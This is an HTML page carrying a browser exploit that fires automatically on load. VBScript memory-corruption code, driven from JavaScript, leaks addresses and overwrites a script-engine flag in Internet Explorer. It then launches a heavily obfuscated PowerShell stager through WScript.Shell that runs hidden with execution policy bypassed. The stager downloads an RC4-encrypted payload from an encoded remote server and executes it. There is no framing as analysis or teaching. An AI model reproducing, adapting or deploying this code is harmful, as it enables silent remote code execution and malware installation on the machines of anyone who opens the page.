
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
    <script type="text/vbscript">
        Dim aw
        Dim plunge(32)
        Dim y(32)
        prefix = "%u4141%u4141"
        d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
        b = String(64000, "D")
        c = d & b
        x = UnEscape(c)
        
        Class ArrayWrapper
            Dim A()
            Private Sub Class_Initialize
                  ReDim Preserve A(1, 2000)
            End Sub
            
            Public Sub Resize()
                ReDim Preserve A(1, 1)
            End Sub
        End Class
        
        Class Dummy
        End Class
        
        Function getAddr (arg1, s)
            aw = Null
            Set aw = New ArrayWrapper
        
            For i = 0 To 32
                Set plunge(i) = s
            Next
        
            Set aw.A(arg1, 2) = s
        
            Dim addr
            Dim i
            For i = 0 To 31
                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
                   addr = strToInt(Mid(y(i), 3 + 4, 2))
                End If
                y(i) = Null
            Next
        
            If addr = Null Then
                document.location.href = document.location.href
                Return
            End If
            getAddr = addr
        End Function
        
        Function leakMem (arg1, addr)
            d = prefix & "%u0008%u4141%u4141%u4141"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
            Dim o
            o = aw.A(arg1, 2)
        
            leakMem = o
        End Function
        
        Sub overwrite (arg1, addr)
            d = prefix & "%u400C%u0000%u0000%u0000"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
        
            aw.A(arg1, 2) = CSng(0)
        End Sub
        
        Function exploit (arg1)
            Dim addr
            Dim csession
            Dim olescript
            Dim mem
        
        
            Set dm = New Dummy
        
            addr = getAddr(arg1, dm)
        
            mem = leakMem(arg1, addr + 8)
            csession = strToInt(Mid(mem, 3, 2))
        
            mem = leakMem(arg1, csession + 4)
            olescript = strToInt(Mid(mem, 1, 2))
            overwrite arg1, olescript + &H174
        Set Object = CreateObject("Wscript.Shell")
        Object.run("CmD   /c  "SET  ifbd=   SeT-ITEm ("V"+"Aria"+"Bl"+"e"+":O3X7Jn") ([tyPE]("{3}{2}{1}{0}{4}"-f 'mA','epOINt','tem.NEt.SERvIC','SYs','nAger')) ; sEt P1T (  [TYpE]("{1}{3}{2}{0}" -F'iNg','T','d','EXT.ENCo')) ;   seT-iTem  ("vaRI"+"ABLe"+":HLi"+"X9")  ([TypE]("{1}{0}"-F 't','coNvEr')  ) ; $7pf = [TyPE]("{5}{1}{3}{2}{0}{4}" -f 'es','M.net.webR','Qu','E','t','SyStE')  ;    seT-iTeM  vaRIABLe:nwdY ([typE]("{3}{4}{2}{6}{5}{1}{0}" -f 'HE','ialCAC','d','sys','TEm.NeT.crE','Nt','e')) ; sv ("z"+"BGMr")  (  [TYpe]("{3}{1}{6}{4}{0}{5}{2}"-f 'odi','yStEm.TE','g','S','t.Enc','n','x')); If(${psVe`RSI`OntabLe}."PsvE`Rs`i`on"."M`AJor" -ge 3){};  $O3x7jN::"EXPE`ct100cont`iN`UE"=0;${W`C}=.("{2}{1}{0}" -f 'ect','j','New-Ob') ("{1}{4}{2}{3}{0}"-f 't','Sy','em.Net.WebCl','ien','st');${u}=("{15}{8}{4}{12}{2}{11}{1}{6}{5}{0}{9}{14}{3}{13}{10}{7}" -f 'r','NT 6.1; WOW64; Tride',' (Windo','0) li','lla/','.0; ','nt/7',' Gecko','zi','v','e','ws ','5.0','k',':11.','Mo');${S`er}=$( $p1t::"un`ic`ode"."gEtS`T`RING"(  (CHiLdiTEm  ("vARI"+"AblE"+":hli"+"x9"))."V`AlUe"::("{2}{0}{1}" -f'RomBAse64S','TrInG','F').Invoke(("{13}{1}{2}{3}{12}{4}{9}{0}{6}{11}{7}{10}{5}{8}" -f 'LgA','AHQA','c','AA6AC8AL','xADA','AA0ADU','wAC','uADE','A','A','ANQA6ADQAN','4AMgA','wA','aAB0'))));${T}=("{0}{2}{3}{1}" -f'/','ocess.php','l','ogin/pr');${W`c}."hEa`deRs".("{0}{1}"-f'Ad','d').Invoke(("{0}{1}{2}"-f 'User-Ag','e','nt'),${U});${W`c}."pRO`xy"=  (  get-VariAblE  7Pf  )."v`ALue"::"DE`FA`ULt`wEbPrOxy";${W`C}."P`ROXY"."Cred`EN`Tials" =   (  GEt-VaRiABle Nwdy -vAl )::"de`Fa`Ult`N`ET`wo`RKCREDENTiA`lS";${SCrIP`T`:proXy} = ${WC}."pRO`XY";${k}= ( get-CHilDiTeM  ('vAr'+'IabLe:'+'ZBgm'+'R')  )."va`lue"::"A`ScIi".("{2}{1}{0}" -f'es','t','GetBy').Invoke('s7k^^~lW2q0SA}oy.G^&t;M5CvUb^|fV^>(z');${r}={${d},${K}=${A`RGS};${s}=0..255;0..255^|^&('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${k}."CO`Unt"])%256;${S}[${_}],${s}[${j}]=${S}[${j}],${S}[${_}]};${D}^|^&('%'){${I}=(${I}+1)%256;${H}=(${H}+${s}[${I}])%256;${s}[${i}],${S}[${H}]=${s}[${H}],${S}[${i}];${_}-bxor${S}[(${s}[${i}]+${s}[${H}])%256]}};${w`c}."Head`ErS".("{0}{1}"-f 'A','dd').Invoke(("{1}{0}{2}"-f 'ooki','C','e'),("{1}{5}{7}{3}{9}{0}{4}{6}{8}{2}"-f 'Q7P+jr','odIaTsB','k67f8Rw=','g','G9','J','G329kV','oPMoI=y','iV9','O'));${dA`Ta}=${WC}.("{3}{0}{1}{2}" -f 'wnl','oadDa','ta','Do').Invoke(${S`eR}+${t});${IV}=${Da`TA}[0..3];${da`Ta}=${d`ATa}[4..${d`Ata}."LEng`Th"];-join[Char[]](^& ${r} ${d`ATa} (${i`V}+${K}))^|.("{1}{0}"-f 'X','IE')  &&  SET   OVu=ECho  ${EXeCUtioNCONtExt}.inVOKeCOMmAnd.invOKEsCRIPT(  (Get-ItEm ENv:IFBD).VaLuE ) ^|  pOWeRShEll  -nONInterACTiVe  -nOProf -win  HIDDEN -EXEcUTiOnpOliC ByPass -noEXi    -  && CmD   /c%oVu%"")
        End Function

        Function triggerBug
            aw.Resize()
            Dim i
            For i = 0 To 32
                ' 24000x2 + 6 = 48006 bytes
                y(i) = Mid(x, 1, 24000)
            Next
        End Function
    </script>
        
    <script type="text/javascript">
        function strToInt(s)
        {
            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
        }
        function intToStr(x)
        {
            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
        }
        var o;
        o = {"valueOf": function () {
                triggerBug();
                return 1;
            }};
        setTimeout(function() {exploit(o);}, 50);
    </script>
</body>
</html>
